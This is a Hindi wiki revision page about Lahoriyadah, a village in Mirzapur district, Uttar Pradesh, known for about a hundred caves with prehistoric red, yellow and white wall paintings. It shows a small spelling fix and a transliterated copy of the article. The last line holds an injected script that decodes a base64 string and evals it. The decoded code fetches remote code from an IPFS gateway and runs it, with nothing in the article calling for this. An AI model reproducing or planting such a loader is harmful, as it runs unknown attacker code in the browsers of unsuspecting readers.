Difference between revisions of "लहोरियादह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''लहोरियादह''' मिर्जापुर ज़िला, उत्तर प्रदेश का एक ...' के साथ नया पन्ना बनाया)
 
m (Text replacement - "संबधित" to "संबंधित")
 
Line 3: Line 3:
 
*'सहबइयापथरी', 'मोरहनापथरी', 'बागापथरी' तथा 'लकहरपथरी' नामक पहाड़ियों में इस प्रकार की लगभग सौ गुफ़ाएँ पाई गई हैं।
 
*'सहबइयापथरी', 'मोरहनापथरी', 'बागापथरी' तथा 'लकहरपथरी' नामक पहाड़ियों में इस प्रकार की लगभग सौ गुफ़ाएँ पाई गई हैं।
 
*गुफ़ाओं के अंदर भित्तियों पर [[लाल रंग|लाल]], [[पीला रंग|पीले]] और [[सफ़ेद रंग|श्वेत]] रंगों में चार-पाँच सहस्र [[वर्ष]] प्राचीन चित्रकारी देखी जा सकती है। ये चित्र [[प्रागैतिहासिक काल]] में इस वन्य भूखंड के आदिम निवासियों द्वारा बनाए गए थे।
 
*गुफ़ाओं के अंदर भित्तियों पर [[लाल रंग|लाल]], [[पीला रंग|पीले]] और [[सफ़ेद रंग|श्वेत]] रंगों में चार-पाँच सहस्र [[वर्ष]] प्राचीन चित्रकारी देखी जा सकती है। ये चित्र [[प्रागैतिहासिक काल]] में इस वन्य भूखंड के आदिम निवासियों द्वारा बनाए गए थे।
*कुछ विद्वानों का मत है कि इस प्रकार के चित्र जादू-टोने से संबधित हैं।
+
*कुछ विद्वानों का मत है कि इस प्रकार के चित्र जादू-टोने से संबंधित हैं।
 
*एक जगह सुसज्जित द्वार के भीतर एक विचित्र मनुष्य चित्रित है, जिसका मुख पक्षी की चोंच के आकार का है। उसके सामने बैठे हुए दो मनुष्य उसकी [[पूजा]] कर रहे हैं।
 
*एक जगह सुसज्जित द्वार के भीतर एक विचित्र मनुष्य चित्रित है, जिसका मुख पक्षी की चोंच के आकार का है। उसके सामने बैठे हुए दो मनुष्य उसकी [[पूजा]] कर रहे हैं।
 
*इन चित्रों से सभ्यता के विकास के पूर्व के मानव का आचार-विचार ज्ञात होता है।
 
*इन चित्रों से सभ्यता के विकास के पूर्व के मानव का आचार-विचार ज्ञात होता है।

Latest revision as of 08:24, 13 October 2017

lahoriyadah mirjapur zila, uttar pradesh ka ek chhota-sa gram hai. aitihasik drishti se yah gram mahattvapoorn hai. mirjapur se riva jane vali s dak gret dakan marg par, mirjapur se prayah 45 mil door is chhote-se gram ke nikat, s dak se kuchh hi doori par anek pragaitihasik gufaean avasthit haian.[1]

  • 'sahabiyapathari', 'morahanapathari', 'bagapathari' tatha 'lakaharapathari' namak paha diyoan mean is prakar ki lagabhag sau gufaean paee gee haian.
  • gufaoan ke aandar bhittiyoan par lal, pile aur shvet rangoan mean char-paanch sahasr varsh prachin chitrakari dekhi ja sakati hai. ye chitr pragaitihasik kal mean is vany bhookhand ke adim nivasiyoan dvara banae ge the.
  • kuchh vidvanoan ka mat hai ki is prakar ke chitr jadoo-tone se sanbandhit haian.
  • ek jagah susajjit dvar ke bhitar ek vichitr manushy chitrit hai, jisaka mukh pakshi ki choanch ke akar ka hai. usake samane baithe hue do manushy usaki pooja kar rahe haian.
  • in chitroan se sabhyata ke vikas ke poorv ke manav ka achar-vichar jnat hota hai.
  • sanbhav hai ki in gufaoan ke tatha is prakar ke any chitroan ke adhyayan se vartaman adivasiyoan ke jivan tatha pragaitihasik manushyoan ke rahan-sahan mean samanata ki kuchh batean milean.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |sankalan: bharatakosh pustakalay |prishth sankhya: 814 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>